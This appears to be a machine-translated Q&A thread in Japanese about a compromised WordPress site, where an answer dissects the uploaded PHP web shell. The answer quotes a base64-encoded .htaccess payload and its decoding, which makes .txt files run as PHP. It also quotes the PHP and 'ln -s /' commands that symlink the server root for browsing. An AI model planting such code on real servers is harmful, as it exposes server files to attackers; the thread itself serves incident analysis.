web-dev-qa-db-ja.com

ハッカーはどのようにして私のWordPressアップロードフォルダにアクセスしましたか?

昨日、これがあることを発見しました http://Pastebin.com/MRRny4Ht PHP友達のサーバーにあるファイル。ハッカーがどのようにアップロードできたか知りたい私は同じような質問を読みましたが、正しい答えを見つけることができませんでした。

編集:-

今日、WordPressサイトがパスワードを総当たりすることによって侵害された(パスワードは強力です)ことを知りました。)彼らがどのようにしてそのパスワードを解読したのかはまだわかりません。

パスワードをクラックした後、ログインしてphpファイルをアップロードしました。Donnazmi.txtについてグーグル検索した後、他の多くのサイトも同じ日に(7月13日)ハッキングされていることがわかりました。同じスクリプトを使用したハックはまだ進行中です。 WordPressサーバーのパスワードがより複雑なものに変更され、それらのphpファイルが削除されました。

回答・コメントありがとうございます。申し訳ありませんが、質問を投稿する際に詳細をお知らせする必要がありました。

2
Sai Krishna

ファイルがサーバーにアップロードされると( wordpress theme のバグを悪用して))、.htaccessは、.txtファイルは、サーバーによって.phpスクリプトとして解釈され、シンボリックリンクに従います。

次のステップはトリックです。彼は symlink/からDonnazmi.txtに変換します(2つの方法)

コードは実際には複雑ではありません。エクスプロイトステップを実行するために必要な設定を含むHTMLフォームを出力します(表示するにはDonnazmiを投稿キーとして投稿リクエストを送信する必要があります)。

コードの説明:

.htaccess reconfig:

$fvckem = 'T3B0aW9ucyBJbmRleGVzIEZvbGxvd1N5bUxpbmtzDQpEaXJlY3RvcnlJbmRleCBzc3Nzc3MuaHRtDQpBZGRUeXBlIHR4dCAucGhwDQpBZGRIYW5kbGVyIHR4dCAucGhw';

これはbase64でエンコードされた文字列で、次のように変換されます。

Options Indexes FollowSymLinks   
DirectoryIndex ssssss.htm        
AddType txt .php                 
AddHandler txt .php              

だからその設定で:

$file = fopen(".htaccess","w+"); // open the file
$write = fwrite ($file ,base64_decode($fvckem)); 
// write the new config inside the file

シンボリックリンク:

// 1. this is a link with the linux comand `ln`
system('ln -s / Donnazmi.txt');
// 2. this is a link php native function
$Donnazmi = symlink("/","Donnazmi.txt");

実行後、彼はexample.com/Donnazmi.txtにアクセスするたびに、サーバーのルートディレクトリのリストを表示しますOptions Indexes tm)。

はい、そのマシンを再構築します。インストールする前にソフトウェアを確認してください。

6
jmingov

私が見つけたビデオは、ハ​​ッカーの名前をグーグルで検索したときに最初に出てきたものです。

たまたまWordpress Cold Fusionテーマがインストールされていますか?

これがいわゆる モーリタニアの攻撃者のビデオ であり、特定のWordPressテーマを利用してサーバーにファイルをアップロードする方法を説明しています。

1
LazyHands